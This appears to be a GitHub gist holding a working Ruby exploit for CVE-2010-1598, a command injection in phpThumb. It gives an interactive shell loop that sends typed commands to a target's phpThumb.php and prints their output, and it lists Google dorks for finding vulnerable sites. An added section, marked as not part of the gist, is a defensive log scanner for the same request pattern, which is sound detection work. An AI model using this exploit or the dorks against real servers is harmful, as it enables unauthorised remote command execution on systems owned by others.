@komodoooo
Created September 20, 2022 18:33
CVE-2010-1598 exploit via "ImageMagick" extension.
require 'net/http'
require 'cgi'

puts """
CVE-2010-1598
PhpThumb OS command injection exploit\n
by Komodo\n
"""

=begin
Google dork to search vulnerable targets:
inurl:phpThumb.php Deprecated: Function eregi() is deprecated in /home/
inurl:"/scripts/phpthumb"
(most of this may not work)
=end

def main(target)
  payload = "?src=file.jpg&fltr[]=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;---;%20&phpThumbDebug=9"
  while true
    print "$ ";command = gets.chomp
    target.delete_suffix!("/") unless target[-1..-1] != "/"
    uwu = "#{target.chomp}/phpThumb.php"+payload.gsub("---", CGI.escape(command))
    r = Net::HTTP.get_response(URI(uwu))
    if r.code == "200"
      if r.body.include?("ImageMagick failed with message")
        begin
          puts "\n#{r.body.match(/ImageMagick failed with message(.*)sh: -quality: command not found/m)[1].strip.split('(')[1]}\n"
        rescue TypeError, NoMethodError
          puts "Null output"
        end
      else
        puts "Maybe the target is not vulnerable"
      end
    else
      puts r.code
    end
  end
end

begin
  print "Url: "
  main(gets.chomp)
rescue => e
  puts e
end
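
A defender-side check for the request shape this script sends, as an added example that is not part of the original gist: it scans web-server access logs for phpThumb.php requests whose fltr[] value contains shell metacharacters or that set phpThumbDebug. The log lines, the CMD placeholder, the combined-log layout and all names below are constructed assumptions.

```ruby
require 'uri'

# Constructed sample access-log lines (combined log format), not real traffic.
# "CMD" is a placeholder standing in for whatever the client injected.
SAMPLE_LOG = <<~'LOG'
  203.0.113.7 - - [20/Sep/2022:18:40:01 +0000] "GET /phpThumb.php?src=photo.jpg&w=200 HTTP/1.1" 200 5120
  203.0.113.9 - - [20/Sep/2022:18:41:12 +0000] "GET /scripts/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;CMD;%20&phpThumbDebug=9 HTTP/1.1" 200 2301
  198.51.100.4 - - [20/Sep/2022:18:42:30 +0000] "GET /phpThumb.php?src=a.jpg&fltr%5B%5D=gam%7C1.2 HTTP/1.1" 200 4100
  198.51.100.8 - - [20/Sep/2022:18:43:02 +0000] "GET /index.php?q=a;b HTTP/1.1" 200 900
LOG

# Shell metacharacters that have no place in a phpThumb filter value.
# '|' is excluded: phpThumb uses it to separate filter parameters (blur|9).
SHELL_META = /[;`&<>\n]|\$\(/

# client IP, request target and status from a combined-format log line
LOG_LINE = /\A(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3})/

def decode(text)
  URI.decode_www_form_component(text)
rescue ArgumentError
  text # malformed %-escape: inspect the raw text instead
end

# Returns one finding per suspicious phpThumb.php request in the log text.
def suspicious_phpthumb_requests(log)
  findings = log.each_line.map do |line|
    m = LOG_LINE.match(line) or next
    ip, target, status = m.captures
    path, query = target.split('?', 2)
    next unless path =~ /phpThumb\.php\z/i && query
    # Split on '&' only, then decode, so fltr%5B%5D and fltr[] compare equal.
    params = query.split('&').map { |kv| kv.split('=', 2).map { |part| decode(part) } }
    reasons = []
    params.each do |key, value|
      filter_key = key.to_s =~ /\Afltr\[\d*\]\z/
      reasons << 'shell metacharacter in fltr[]' if filter_key && value.to_s =~ SHELL_META
      reasons << 'phpThumbDebug requested' if key == 'phpThumbDebug' # weaker signal
    end
    reasons.empty? ? nil : { ip: ip, status: status, reasons: reasons.uniq }
  end
  findings.compact
end

suspicious_phpthumb_requests(SAMPLE_LOG).each { |f| puts f.inspect } if __FILE__ == $PROGRAM_NAME
```

A hit with status 200 is the one to triage first, since the script above only treats a 200 response as a candidate for command output.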
komodoooo commented Jun 24, 2023

Unfortunately, most of the results indexed by Google are no longer vulnerable because the CVE is relatively old.
